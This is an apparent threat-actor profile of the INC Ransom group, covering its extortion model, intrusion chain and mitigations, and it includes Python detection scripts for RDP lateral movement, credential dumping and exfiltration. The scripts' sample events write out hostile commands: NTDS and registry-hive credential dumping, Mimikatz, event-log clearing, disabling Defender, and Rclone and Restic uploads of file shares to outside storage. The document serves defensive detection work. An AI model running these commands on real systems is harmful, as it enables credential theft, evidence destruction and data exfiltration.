Prepared by: Nick Thanos | Published: 30 June 2026
Threat actor profile: INC Ransom
Threat actor status: ACTIVE
Since July 2023, a ransomware group called INC Ransom has been targeting organisations across healthcare, government, energy and critical infrastructure by stealing sensitive data and threatening to publish it unless a ransom is paid. Active globally and observed directly by Triskele Labs across seven incident response engagements in Australia, the group operates under a ransomware-as-a-service (RaaS) model and distinguishes itself through deliberate social engineering, framing extortion as a reputational protection service. Victims are told that paying is not capitulating to criminals; it is a business decision that protects their reputation. That framing, combined with a methodical approach to exploiting weak remote access infrastructure, makes INC Ransom one of the more consistent ransomware threats active today.
INC Ransom: Background
INC Ransom first appeared in July 2023 and has since established itself as a persistent presence in the global ransomware ecosystem. The group operates under a ransomware-as-a-service model, where a core operator provides infrastructure and tooling to a network of affiliates who carry out intrusions in exchange for a share of ransom proceeds. This structure allows the group to run multiple simultaneous campaigns without the core operators conducting every intrusion themselves.
The group's double extortion model works in two stages. Before deploying encryption, affiliates exfiltrate sensitive data from the victim environment. Victims are then presented with two demands: pay to prevent release of that data on INC Ransom's dark web leak site (a website hosted on the Tor network where ransomware groups publish stolen data from victims who decline to pay), and pay for a decryptor to restore access to encrypted systems.
The framing is deliberately clinical. INC Ransom positions the ransom payment as a service exchange that protects the victim's reputation, designed to lower psychological resistance to payment and to make non-compliance feel like a deliberate business decision with predictable consequences. The leak site functions as both an extortion mechanism and a public record of non-compliant victims, creating downstream consequences including regulatory scrutiny, client notification obligations and reputational damage.
The group targets organisations across aerospace, defence, automotive, energy and utilities, healthcare, government, pharmaceuticals, technology, telecommunications, and transport and logistics. Triskele Labs' seven direct engagements are consistent with opportunistic targeting rather than a deliberate regional strategy, though sectors where data confidentiality and service availability are operationally critical are a clear preference.
How INC Ransom Operates
Across the seven incidents responded to by Triskele Labs, a consistent and methodical pattern of compromise emerged.
Initial Access: VPN and Internet-Facing Software Exploitation
The most common entry point is the exploitation of VPN credentials or vulnerabilities in software exposed to the internet. A Virtual Private Network, or VPN, is a service that allows authorised users to connect securely to an organisation's internal network from outside the office. When VPN services lack Multi-Factor Authentication (MFA), a security control requiring users to verify identity through at least two methods such as a password and a one-time code, or when the underlying software carries an unpatched vulnerability, they become a reliable entry point.
This is consistent with the broader Australian landscape. Exposed SSL VPN services without MFA were the single largest initial access vector across all Triskele Labs ransomware engagements in FY25, accounting for 23 incidents, up 64% from the previous year. In some engagements, the entry point was a different internet-facing application rather than the VPN itself; the result is the same: a foothold inside the network perimeter without triggering any perimeter alert.
Initial Access: Trusted Third-Party and MSP Access
A distinct and harder-to-detect vector observed in INC Ransom engagements is the exploitation of trusted third-party relationships, specifically the privileged access that managed service providers (MSPs) hold into client environments. An MSP is an external IT provider that manages systems or security services on behalf of a client. To do that work, the MSP is typically granted elevated, often domain-level access that is persistent rather than time-limited.
Where a threat actor compromises an MSP's credentials or systems, they inherit that access across the MSP's client base. From the client environment's perspective, the connection appears entirely legitimate, as it arrives from a known source, uses valid credentials, and travels over an established access path. There are no perimeter alerts, no failed authentication attempts, and no anomalous tooling at the point of entry.
This vector is particularly difficult to detect because the usual indicators of initial compromise are absent. Triskele Labs observed third-party compromise as a recurring theme across FY25; in a number of cases, MSP accounts carried full administrator privileges with no MFA enforced, and access was permitted from unmanaged devices with no source location restrictions. For organisations that rely on MSPs, the security posture of that third party is directly part of their own risk profile.
Lateral Movement via Remote Desktop Protocol
Once inside the environment, INC Ransom affiliates consistently use Remote Desktop Protocol (RDP) to move laterally between systems. RDP is a Microsoft technology that allows a user to connect to and control a remote computer as though they were sitting in front of it; it is standard within most Windows environments and routinely used by IT administrators. Using valid domain credentials, a threat actor can traverse the internal network, identify high-value targets such as domain controllers and file servers, and conduct reconnaissance without deploying specialised tooling. RDP was the lateral movement mechanism in every one of the seven Triskele Labs engagements.
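As an added example (not part of the original article and not Triskele Labs' tooling), the following Python scans Windows Security 4624 logon events for the shape of RDP lateral movement described above: RDP sessions originating from hosts that are not approved jump hosts, sessions to domain controllers or backup servers, sessions outside business hours, and one account fanning out to several hosts within a short window. The event records, host names, approved sources, business hours and thresholds are all constructed assumptions.

```python
"""Detect RDP lateral-movement patterns in Windows Security 4624 events.

Added example for this article, not Triskele Labs tooling. The event records,
host names, approved jump hosts and thresholds are constructed assumptions.
"""
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample of Security log 4624 events. LogonType 10 is
# RemoteInteractive (an RDP session); LogonType 3 is a network logon (SMB etc.).
SAMPLE_EVENTS = [
    {"id": 4624, "type": 10, "user": "jsmith", "src": "ADM-JUMP01", "dst": "FS01", "time": "2025-03-04T10:12:00"},
    {"id": 4624, "type": 10, "user": "svc_backup", "src": "WS-0231", "dst": "DC01", "time": "2025-03-05T02:41:00"},
    {"id": 4624, "type": 10, "user": "svc_backup", "src": "WS-0231", "dst": "FS01", "time": "2025-03-05T02:44:00"},
    {"id": 4624, "type": 10, "user": "svc_backup", "src": "WS-0231", "dst": "BKP01", "time": "2025-03-05T02:47:00"},
    {"id": 4624, "type": 10, "user": "svc_backup", "src": "WS-0231", "dst": "FS02", "time": "2025-03-05T02:50:00"},
    {"id": 4624, "type": 3, "user": "jsmith", "src": "WS-0004", "dst": "FS01", "time": "2025-03-05T09:00:00"},
]

# Assumed environment model (hypothetical): hosts allowed to originate RDP,
# tier-0 and backup assets, local business hours, and fan-out limits.
APPROVED_RDP_SOURCES = {"ADM-JUMP01", "ADM-JUMP02"}
HIGH_VALUE_HOSTS = {"DC01", "DC02", "BKP01"}
BUSINESS_HOURS = range(7, 19)   # 07:00-18:59 local time
FAN_OUT_THRESHOLD = 3           # distinct destinations per (user, source) window
FAN_OUT_WINDOW_MIN = 30


def rdp_logons(events):
    """Keep only successful RemoteInteractive (RDP) logons."""
    return [e for e in events if e["id"] == 4624 and e["type"] == 10]


def detect_rdp_anomalies(events):
    """Return a list of (rule_name, detail) findings."""
    findings = []
    sessions = rdp_logons(events)

    # Per-session rules: unexpected source, sensitive destination, odd hours.
    for e in sessions:
        hour = datetime.fromisoformat(e["time"]).hour
        if e["src"] not in APPROVED_RDP_SOURCES:
            findings.append(("rdp_from_unapproved_source", e))
        if e["dst"] in HIGH_VALUE_HOSTS:
            findings.append(("rdp_to_high_value_host", e))
        if hour not in BUSINESS_HOURS:
            findings.append(("rdp_outside_hours", e))

    # Fan-out rule: one account from one source reaching many hosts quickly,
    # the shape of an operator walking the network with valid credentials.
    by_actor = defaultdict(list)
    for e in sessions:
        by_actor[(e["user"], e["src"])].append(e)
    for (user, src), evs in by_actor.items():
        evs.sort(key=lambda x: x["time"])
        times = [datetime.fromisoformat(x["time"]) for x in evs]
        for i in range(len(evs)):
            reached = set()
            for j in range(i, len(evs)):
                if (times[j] - times[i]).total_seconds() > FAN_OUT_WINDOW_MIN * 60:
                    break
                reached.add(evs[j]["dst"])
            if len(reached) >= FAN_OUT_THRESHOLD:
                findings.append(("rdp_fan_out", {"user": user, "src": src,
                                                 "hosts": sorted(reached), "from": evs[i]["time"]}))
                break  # one fan-out finding per actor is enough
    return findings


def rule_counts(findings):
    """Summarise findings as a rule -> count mapping."""
    return Counter(rule for rule, _ in findings)


if __name__ == "__main__":
    for rule, detail in detect_rdp_anomalies(SAMPLE_EVENTS):
        print(f"{rule:28s} {detail}")
```

LogonType 10 is the RemoteInteractive logon that RDP produces, so the same logic can be fed from a SIEM export of 4624 events. Tune APPROVED_RDP_SOURCES to the jump hosts administrators actually use; if that set is wrong, the first rule is all noise and the fan-out rule is the one that still carries signal.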
Privilege Escalation and Credential Access
Escalating to domain administrator level is a critical step in the attack chain. Domain administrator credentials provide unrestricted access across the environment, including the ability to modify Group Policy, disable security tooling, and reach every system on the network.
INC Ransom affiliates pursue this through OS credential dumping against two stores: the Active Directory database (NTDS), the centralised store of all user accounts and password hashes within a Windows domain, and Local Security Authority (LSA) secrets, sensitive credential material Windows stores to support automatic service functions. Two tools were observed in use. Mimikatz is a post-exploitation tool that extracts passwords and authentication tokens directly from Windows memory. DonPAPI leverages the Windows Data Protection API (DPAPI), the mechanism Windows uses to encrypt sensitive data on behalf of applications, to extract credentials and browser cookies. Where existing domain credentials are available, the group abuses them rather than creating new accounts, reducing its forensic footprint.
Defence Evasion
INC Ransom operators take deliberate steps to reduce visibility and remove evidence. Observed techniques include clearing Windows Event Logs, the primary record of system and security activity on a Windows machine; deleting artefacts left behind during the intrusion; masquerading malicious scheduled tasks or services with legitimate-sounding names; and disabling or modifying security tools, including EDR software and antivirus.
Group Policy modification was also observed. Group Policy is a Windows feature allowing administrators to define and enforce settings across all systems in an organisation from a central location. Modifying Group Policy Objects (GPOs) allows the threat actor to subvert access controls and push configuration changes across the entire domain simultaneously, changes that are difficult to reverse quickly under incident response pressure. By the time encryption is deployed, a significant portion of the forensic record may already have been destroyed.
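The credential dumping described under Privilege Escalation and Credential Access and the log clearing and tool tampering described under Defence Evasion both leave traces in process-creation telemetry. As an added example (not part of the original article and not Triskele Labs' tooling), the following Python applies command-line signatures for those techniques to Sysmon Event ID 1 or Security 4688 style records and then flags hosts that show both credential access and anti-forensic activity. The events and host names are constructed; the patterns are generic signatures for the techniques the article names, not indicators taken from the incidents. DonPAPI collects DPAPI material remotely over SMB rather than as a local process, so it is deliberately out of scope for these rules.

```python
"""Flag credential-dumping and anti-forensic command lines in process-creation
telemetry (Sysmon Event ID 1, or Security 4688 with command-line auditing).

Added example for this article, not Triskele Labs tooling. Events and host
names are constructed; the regexes are generic signatures for NTDS and LSA
secrets dumping, Mimikatz, event log clearing and Defender tampering.
"""
import re
from collections import defaultdict

# (rule name, ATT&CK technique, regex applied to the full command line)
RULES = [
    ("ntdsutil_ifm",       "T1003.003", r"ntdsutil.*\b(ifm|ntds)\b"),
    ("shadow_copy_create", "T1003.003", r"(vssadmin\s+create\s+shadow|wmic\s+shadowcopy\s+call\s+create)"),
    ("ntds_dit_access",    "T1003.003", r"ntds\.dit"),
    ("registry_hive_save", "T1003.004", r"reg(\.exe)?\s+save\s+hklm\\(security|sam|system)"),
    ("mimikatz_module",    "T1003",     r"(sekurlsa::|lsadump::|privilege::debug)"),
    ("event_log_clear",    "T1070.001", r"(wevtutil(\.exe)?\s+(cl|clear-log)\b|clear-eventlog)"),
    ("defender_tamper",    "T1562.001", r"set-mppreference.*-disable"),
]
COMPILED = [(name, tech, re.compile(pat, re.IGNORECASE)) for name, tech, pat in RULES]

# Constructed sample events. Hosts and account names are hypothetical.
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\temp\ifm" q q'},
    {"host": "DC01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": r"vssadmin create shadow /for=C:"},
    {"host": "DC01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": r"cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\temp\ntds.bak"},
    {"host": "DC01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": r"reg save HKLM\SECURITY C:\temp\sec.hiv"},
    {"host": "FS01", "user": "CORP\\svc_backup", "parent": "powershell.exe",
     "cmdline": r'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"host": "DC01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": r"wevtutil cl Security"},
    {"host": "WS-0231", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "cmdline": r'powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    # Benign activity that must not fire: listing shadows, a normal service host.
    {"host": "BKP01", "user": "CORP\\svc_backup", "parent": "BackupAgent.exe",
     "cmdline": r"vssadmin list shadows"},
    {"host": "FS01", "user": "NT AUTHORITY\\SYSTEM", "parent": "services.exe",
     "cmdline": r"svchost.exe -k netsvcs -p"},
]


def match_event(event):
    """Return the (rule, technique) hits for one process-creation event."""
    cmd = event["cmdline"]
    return [(name, tech) for name, tech, rx in COMPILED if rx.search(cmd)]


def scan(events):
    """Apply every rule to every event; one finding per (event, rule) hit."""
    findings = []
    for e in events:
        for name, tech in match_event(e):
            findings.append({"host": e["host"], "user": e["user"], "rule": name,
                             "technique": tech, "cmdline": e["cmdline"]})
    return findings


def techniques_by_host(findings):
    """host -> set of rule names that fired there."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f["host"]].add(f["rule"])
    return dict(by_host)


def escalate(findings):
    """Hosts showing both credential access (T1003*) and indicator removal or
    defence impairment (T1070*, T1562*): the dump-then-destroy-the-record
    pattern the article describes. Returns a sorted host list."""
    tech_by_host = defaultdict(set)
    for f in findings:
        tech_by_host[f["host"]].add(f["technique"])
    out = []
    for host, techs in tech_by_host.items():
        cred = any(t.startswith("T1003") for t in techs)
        evade = any(t.startswith(("T1070", "T1562")) for t in techs)
        if cred and evade:
            out.append(host)
    return sorted(out)


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['host']:8s} {f['technique']:10s} {f['rule']:20s} {f['cmdline']}")
    print("escalate:", escalate(hits))
```

Command-line auditing has to be switched on for 4688 to carry the command line at all; Sysmon records it by default. The escalation step matters because a single `vssadmin create shadow` is routine on a backup host, whereas shadow creation, an `ntds.dit` copy and `wevtutil cl Security` on the same domain controller within one dataset is the article's attack chain in miniature.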
Data Collection and Exfiltration
Before encryption, INC Ransom affiliates collect and stage data from network shared drives, the shared folders and file servers organisations use to store and distribute information internally. Data is consolidated locally before being transferred out.
Rclone, a command-line program designed to synchronise files between a local system and cloud storage services, repurposed here to quietly transfer stolen data to attacker-controlled cloud infrastructure, is among the tools observed. Mega, a cloud storage and file-sharing platform offering encrypted storage and transfer, has been used as a destination for exfiltrated data. Restic, an open-source backup tool designed for encrypted deduplicated backups, has also been observed repurposed for exfiltration. Data is transferred over alternative protocols or directly to cloud storage rather than over the primary command-and-control channel, reducing the likelihood of detection.
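Because Rclone, Restic and the Mega clients are legitimate software, detecting them as exfiltration tooling depends on context: where they run, whether the binary has been renamed, where the data is going, and whether outbound volume departs from the host's baseline. As an added example (not part of the original article and not Triskele Labs' tooling), the following Python correlates process-creation records with daily per-host outbound byte totals. It uses the Sysmon OriginalFileName field so that a renamed rclone.exe is still recognised, extracts the remote target from the command line, suppresses documented backup jobs, and rates a hit high when the same host also shows an outbound volume anomaly. Process events, byte counts, approved jobs and client binary names are constructed assumptions; the IP addresses are from the TEST-NET documentation range.

```python
"""Correlate exfiltration tooling with outbound volume anomalies.

Added example for this article, not Triskele Labs tooling. Process events,
per-host outbound totals, approved backup jobs and client binary names are
constructed assumptions. Input shapes assume Sysmon Event ID 1 fields
(Image, OriginalFileName, CommandLine) and a daily per-host outbound total
from a firewall or flow collector.
"""
import re
import statistics

# Binaries for the tools the article names (assumed client names). The
# OriginalFileName comes from the PE version resource, so a renamed
# rclone.exe still carries "rclone.exe" in Sysmon telemetry.
EXFIL_TOOLS = {"rclone.exe", "restic.exe", "megacmd.exe", "megasync.exe"}
# Hosts and tools with a documented, approved backup job (assumption).
APPROVED_BACKUP_JOBS = {("BKP01", "restic.exe")}
# "name:" remote spec as used by rclone remotes and restic repositories;
# excludes drive letters (C:\) and URL schemes (http://).
REMOTE_RE = re.compile(r"(?<![\w\\.])([a-z][a-z0-9_-]*):(?![\\/])", re.IGNORECASE)

SAMPLE_PROCESS_EVENTS = [
    {"host": "FS01", "image": r"C:\ProgramData\svchost.exe", "original_file_name": "rclone.exe",
     "cmdline": r'svchost.exe copy "\\FS01\Finance" mega:archive --transfers 32 -q'},
    {"host": "FS01", "image": r"C:\Users\Public\restic.exe", "original_file_name": "restic.exe",
     "cmdline": r"restic.exe -r rest:http://203.0.113.10:8000/ backup \\FS01\HR"},
    {"host": "BKP01", "image": r"C:\Program Files\Backup\restic.exe", "original_file_name": "restic.exe",
     "cmdline": r"restic.exe -r sftp:backup@203.0.113.20:/restic backup D:\Backups"},
    {"host": "FS01", "image": r"C:\Windows\explorer.exe", "original_file_name": "EXPLORER.EXE",
     "cmdline": r"explorer.exe"},
]

# Constructed daily outbound totals in GB: 14-day history and today's figure.
OUTBOUND_HISTORY_GB = {
    "FS01": [1.8, 2.1, 1.9, 2.4, 2.0, 1.7, 2.2, 1.9, 2.3, 2.0, 1.8, 2.1, 2.0, 1.9],
    "BKP01": [40, 42, 39, 41, 40, 43, 41, 40, 42, 41, 39, 40, 41, 42],
    "WS-0231": [0.2, 0.3, 0.2, 0.1, 0.3, 0.2, 0.2, 0.3, 0.1, 0.2, 0.3, 0.2, 0.2, 0.1],
}
OUTBOUND_TODAY_GB = {"FS01": 186.0, "BKP01": 44.0, "WS-0231": 0.3}


def binary_name(event):
    """Return (original, on_disk) names; original defeats simple renaming."""
    on_disk = event["image"].rsplit("\\", 1)[-1].lower()
    original = (event.get("original_file_name") or on_disk).lower()
    return original, on_disk


def tool_executions(proc_events):
    """Every execution of a known sync/backup tool, with context attached."""
    hits = []
    for e in proc_events:
        original, on_disk = binary_name(e)
        if original not in EXFIL_TOOLS:
            continue
        m = REMOTE_RE.search(e["cmdline"])
        hits.append({"host": e["host"], "tool": original, "renamed": original != on_disk,
                     "remote": m.group(1).lower() if m else None,
                     "approved": (e["host"], original) in APPROVED_BACKUP_JOBS})
    return hits


def volume_anomalies(history, today, sigma=3.0, ratio=5.0, min_days=7):
    """Hosts whose outbound total today exceeds both a sigma-based and a
    ratio-based threshold; both are required so a flat baseline with tiny
    variance does not fire on trivial changes."""
    out = {}
    for host, gb in today.items():
        hist = history.get(host, [])
        if len(hist) < min_days:
            continue  # not enough baseline to judge
        mean, sd = statistics.mean(hist), statistics.pstdev(hist)
        threshold = max(mean + sigma * sd, ratio * mean)
        if gb > threshold:
            out[host] = {"today_gb": gb, "baseline_gb": round(mean, 2),
                         "threshold_gb": round(threshold, 2)}
    return out


def correlate(proc_events, history, today):
    """Join tool executions with volume anomalies into severity-rated findings."""
    tools = tool_executions(proc_events)
    vols = volume_anomalies(history, today)
    findings, hosts_with_tools = [], set()
    for t in tools:
        if t["approved"]:
            continue  # documented job: suppress the tool hit, volume rule still applies
        hosts_with_tools.add(t["host"])
        findings.append({"severity": "high" if t["host"] in vols else "medium",
                         "host": t["host"], "volume": vols.get(t["host"]),
                         "reason": f"{t['tool']} ({'renamed' if t['renamed'] else 'on-disk name'}) "
                                   f"to remote '{t['remote']}'"})
    for host, v in vols.items():
        if host not in hosts_with_tools:
            findings.append({"severity": "medium", "host": host, "volume": v,
                             "reason": "outbound volume anomaly without known tooling"})
    return findings


if __name__ == "__main__":
    for f in correlate(SAMPLE_PROCESS_EVENTS, OUTBOUND_HISTORY_GB, OUTBOUND_TODAY_GB):
        print(f"[{f['severity']}] {f['host']}: {f['reason']} {f['volume'] or ''}")
```

The volume rule on its own is a blunt instrument, which is why approved backup hosts are handled by suppressing the tool hit rather than exempting the host: a backup server that suddenly ships five times its normal daily volume still surfaces as a medium finding. In a live deployment the daily totals would come from the perimeter firewall or a flow collector, keyed on the same host names the endpoint telemetry uses.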
Encryption and Impact
Encryption is the final stage and typically the first event that triggers visible disruption. By this point, exfiltration is complete and leverage is established. Scheduled tasks, a Windows feature that runs programs automatically at defined times or intervals, are used to deploy the ransomware payload broadly and in sequence. Windows services are also abused to ensure persistent execution during deployment. The ransom note frames payment as a business transaction protecting the victim's reputation and the decryptor is positioned as a secondary benefit.
INC Ransom: Reducing your exposure
The consistent entry points and techniques observed across INC Ransom engagements mean there are clear, actionable controls that reduce risk materially.
- Enforce MFA across all external-facing services without exception.
  INC Ransom's most common entry point is an exposed VPN or internet-facing service without MFA. Without it, a stolen username and password is sufficient for full access. This single control, consistently applied to VPN gateways, Remote Desktop Gateway (RDG) servers and any other externally accessible service, would prevent the majority of observed INC Ransom intrusions. Note that RDG servers do not natively support MFA; additional configuration is required, and organisations should seek specialist advice if uncertain whether their RDG is adequately protected.
- Patch internet-facing systems promptly and maintain a current asset inventory.
  INC Ransom affiliates exploit unpatched vulnerabilities in internet-facing applications as a primary entry method. A documented patch management programme with defined timelines for critical patches, typically 24 to 72 hours for actively exploited vulnerabilities on externally accessible systems, reduces the window of exposure. Where immediate patching is not possible, implement compensating controls such as taking the affected service offline or tightening network access until the vulnerability is remediated.
- Govern third-party and MSP access with the same rigour applied to internal administrators.
  INC Ransom has been observed gaining initial access through MSP connections, a vector that bypasses perimeter controls entirely. Maintain a centralised register of all third-party accounts; enforce MFA for all external access without exception, including MSP accounts; restrict access to known IP ranges or managed devices where possible; implement time-limited rather than persistent standing permissions; and log and monitor all third-party activity. External parties should not be treated as trusted insiders without equivalent controls applied.
- Restrict and monitor RDP within the internal network.
  INC Ransom uses RDP as its primary lateral movement mechanism. Limit RDP access to only the systems and accounts that require it for legitimate purposes, enforce strong authentication for all RDP sessions, and monitor for activity outside normal patterns, particularly sessions initiated from unexpected source systems, at unusual hours, or targeting domain controllers and backup infrastructure. Network segmentation that prevents workstations from initiating RDP connections directly to servers significantly reduces available lateral movement paths.
- Deploy and maintain EDR across every endpoint and server.
  Standard antivirus does not detect the credential access, lateral movement and defence evasion techniques INC Ransom uses once inside a network. Endpoint Detection and Response (EDR) solutions, which monitor device behaviour continuously and alert on suspicious activity, provide the required visibility. EDR must be deployed consistently, as threat actors routinely identify hosts without security tooling and use them as staging grounds. Tamper protection should be enabled so that tooling cannot be disabled by an unauthorised process.
- Protect Active Directory and monitor for credential dumping.
  INC Ransom targets Active Directory credential stores directly using Mimikatz and DonPAPI. Monitor for processes and behaviours associated with credential dumping; implement the Protected Users security group and Credential Guard where appropriate; and ensure domain administrator accounts are used only for domain administration tasks and are never exposed on workstations where credential material could be harvested.
- Monitor for exfiltration tooling and anomalous outbound data volumes.
  INC Ransom uses Rclone, Mega and Restic for exfiltration. Because these tools are not inherently malicious, detection requires behavioural context. Build detections that flag unexpected use of cloud sync and backup tooling in combination with large data staging activity or unusual outbound volumes, and set alerts on outbound data volumes exceeding normal baselines, particularly outside business hours.
- Ensure security alerting is monitored around the clock.
  INC Ransom conducts its most disruptive activity outside business hours. Alerts generated overnight or over weekends and reviewed the following morning represent a window in which a threat actor can move from initial access to full encryption undetected. Whether through an internal security operations capability or an external managed detection and response (MDR) provider, continuous monitoring is essential.
Summary
INC Ransom is an active, financially motivated ransomware group operating under a ransomware-as-a-service model since July 2023. Its defining characteristic is the deliberate framing of extortion as a reputational protection service: pay, and the group prevents publication of your data; don't pay, and your organisation's name and data appear on their leak site. That framing, combined with a methodical approach to exploiting weak remote access infrastructure, makes it one of the more consistent ransomware threats in the Australian market.
Triskele Labs has responded directly to seven INC Ransom incidents. The pattern is consistent: gain initial access through an exposed VPN, a vulnerable internet-facing application, or a trusted MSP connection; move laterally via RDP using valid domain credentials; escalate to domain administrator level through credential dumping; disable security tooling and clear logs; stage and exfiltrate data using Rclone, Mega, or Restic; then deploy ransomware via scheduled tasks at scale.
The MSP access vector deserves particular attention. Where a trusted third party holds persistent, privileged access to a client environment, the security controls applied to that third party's own systems and credentials directly determine the client's exposure. Internal controls alone cannot fully address this risk.
The defences most likely to disrupt an INC Ransom intrusion are foundational: enforce MFA on all external-facing services, patch promptly, govern third-party access rigorously, deploy EDR consistently, and ensure alerting is monitored at all hours. INC Ransom is not a technically exceptional group. It succeeds because the environments it targets have not applied the controls that would stop it at the door.
If your organisation has experienced an INC Ransom incident or suspects a compromise involving ransomware or data exfiltration, engage your cyber insurer and a reputable DFIR firm promptly. Early investigation is critical to understanding the scope of data accessed, meeting regulatory notification obligations, and preventing further exposure.
MITRE ATT&CK Mapping
| TACTIC | TECHNIQUE | DESCRIPTION |
|---|---|---|
| Initial Access | T1078.002 - Valid Accounts: Domain Accounts | Obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defence Evasion. |
| Initial Access | T1133 - External Remote Services | Leverage external-facing remote services to initially access and/or persist within a network. |
| Initial Access | T1190 - Exploit Public-Facing Application | Attempt to exploit a weakness in an internet-facing host or system to initially access a network. |
| Initial Access | T1199 - Trusted Relationship | The Threat Actor used the managed service provider's (MSP's) access to the client's environment for initial access. |
| Persistence | T1053.005 - Scheduled Task/Job: Scheduled Task | A scheduled task was created to execute a malicious program or code. |
| Persistence | T1136.001 - Create Account: Local Account | Create a local account to maintain access to victim systems. |
| Persistence | T1543.003 - Create or Modify System Process: Windows Service | Create or modify Windows services to repeatedly execute malicious payloads as part of persistence. |
| Execution | T1053.005 - Scheduled Task/Job: Scheduled Task | Abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. |
| Execution | T1059.001 - Command and Scripting Interpreter: PowerShell | Abuse PowerShell commands and scripts for execution. |
| Execution | T1059.003 - Command and Scripting Interpreter: Windows Command Shell | Abuse the Windows command shell for execution. |
| Execution | T1203 - Exploitation for Client Execution | Exploit software vulnerabilities in client applications to execute code. |
| Execution | T1204.002 - User Execution: Malicious File | Rely upon a user opening a malicious file to gain execution. |
| Defence Evasion | T1070.001 - Indicator Removal: Clear Windows Event Logs | Clear Windows Event Logs to hide the activity of an intrusion. |
| Defence Evasion | T1070.004 - Indicator Removal: File Deletion | Delete files left behind by the actions of their intrusion activity. |
| Defence Evasion | T1036.004 - Masquerading: Masquerade Task or Service | Attempt to manipulate the name of a task or service to make it appear legitimate or benign. |
| Defence Evasion | T1484.001 - Domain or Tenant Policy Modification: Group Policy Modification | Modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain. |
| Defence Evasion | T1562.001 - Impair Defences: Disable or Modify Tools | Modify and/or disable security tools to avoid possible detection of their malware and activities. |
| Credential Access | T1003.003 - OS Credential Dumping: NTDS | Attempt to access or create a copy of the Active Directory domain database to steal credential information. |
| Credential Access | T1003.004 - OS Credential Dumping: LSA Secrets | The Local Security Authority (LSA) secrets containing credentials were collected by the Threat Actor. |
| Privilege Escalation | T1078.002 - Valid Accounts: Domain Accounts | Abuse existing domain account credentials, rather than newly created accounts, to reach domain administrator level and operate across the environment. |
| Credential Access | T1212 - Exploitation for Credential Access | Exploit software vulnerabilities in an attempt to collect credentials. |
| Discovery | T1046 - Network Service Discovery | Attempt to get a listing of services running on remote hosts and local network infrastructure devices. |
| Discovery | T1087.002 - Account Discovery: Domain Account | Domain account information was collected. |
| Discovery | T1135 - Network Share Discovery | Look for folders and drives shared on remote systems as a means of identifying sources of information to gather. |
| Lateral Movement | T1021.001 - Remote Services: Remote Desktop Protocol | Use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). |
| Collection | T1039 - Data from Network Shared Drive | Data was collected from shared network drives. |
| Collection | T1074.001 - Data Staged: Local Data Staging | Stage collected data in a central location or directory on the local system prior to exfiltration. |
| Collection | T1560.001 - Archive Collected Data: Archive via Utility | Use utilities to compress and/or encrypt collected data prior to exfiltration. |
| Command and Control | T1219 - Remote Access Software | Use legitimate remote access tools to establish an interactive command and control channel within a network. |
| Exfiltration | T1048 - Exfiltration Over Alternative Protocol | Steal data by exfiltrating it over a different protocol than that of the existing command and control channel. |
| Exfiltration | T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage | Exfiltrate data to a cloud storage service rather than over their primary command and control channel. |
| Impact | T1486 - Data Encrypted for Impact | Encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. |
Commonly Utilised Tooling
| TOOL | PURPOSE |
|---|---|
| Mimikatz | Credential dumping tool used to extract passwords and authentication tokens from Windows memory. |
| PsExec | Remote administration tool used to execute commands on other systems across the network. |
| Rclone | Command-line cloud storage sync tool repurposed for large-scale data exfiltration to attacker-controlled infrastructure. |
| Mega | Cloud storage platform used as a destination for exfiltrated data. |
| Restic | Open-source backup tool repurposed for encrypted exfiltration of stolen data. |
| AnyDesk | Legitimate remote desktop application repurposed for persistent access and command and control. |
| DonPAPI | Post-exploitation tool used to extract credentials and sensitive data via the Windows Data Protection API. |
| ScreenConnect | Remote support and access software repurposed for persistent access and lateral movement. |
More reading
- State of Cyber: Threat Actors
  https://www.stateofcyber.com.au/report/dfir#threat-actors-are-getting-smarter
  Contextualises INC Ransom within the broader Australian ransomware landscape
- Threat Actor: Akira
  https://www.triskelelabs.com/resources/akira_seven-australian-victims-in-a-year
  Sister article in the same threat actor series
- Threat Actor: KillSec
  https://www.triskelelabs.com/resources/killsec3-what-australian-organisations-need-to-know
  Sister article in the same threat actor series
- Threat Actor: SafePay
  https://www.triskelelabs.com/resources/safepay-ransomware-targeting-australian-organisations
  Sister article in the same threat actor series